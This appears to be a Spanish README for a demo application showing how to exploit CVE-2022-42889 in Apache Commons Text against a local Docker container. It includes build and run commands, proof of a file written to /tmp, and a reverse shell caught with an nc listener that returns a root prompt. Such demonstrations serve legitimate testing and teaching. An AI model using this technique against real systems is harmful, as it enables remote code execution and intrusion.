
Una aplicación sencilla que muestra cómo explotar la vulnerabilidad CVE-2022-42889.
Una aplicación de demostración simple que muestra cómo explotar la vulnerabilidad CVE-2022-42889.
Utiliza servicios OOB (Out of Band) para demostrar los prefijos dns y url.
JavaDocs para la interpolación de commons-text commons-text JavaDocs
Interpolaciones de ejemplo
Cita de Rapid7
La vulnerabilidad se ha comparado con Log4Shell, ya que es una vulnerabilidad a nivel de biblioteca de código abierto que probablemente afecte a una amplia variedad de aplicaciones de software que utilizan el objeto correspondiente.
Sin embargo, el análisis inicial indica que se trata de una comparación incorrecta. La naturaleza de la vulnerabilidad implica que, a diferencia de Log4Shell, será raro que una aplicación utilice el componente vulnerable de Commons Text para procesar entradas no confiables y potencialmente maliciosas.
Se pueden omitir Java y maven si se obtiene una imagen de Docker Hub
Compilar la aplicación
mvn clean package
Crear la imagen docker
docker build -t cve-2022-42889-poc .
Ejecutar la imagen docker
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
Acceder a la aplicación y seguir las instrucciones
open http://localhost:8081
Comprobar que la vulnerabilidad crea un nuevo archivo en el directorio /tmp/ (/tmp/blop)
➜ ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp
blop tomcat-docbase.8081.12439436974042217796
hsperfdata_root tomcat.8081.2549096106233509364
➜ ~
Shell inversa. Ejecuta "nc" en tu máquina local
➜ ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

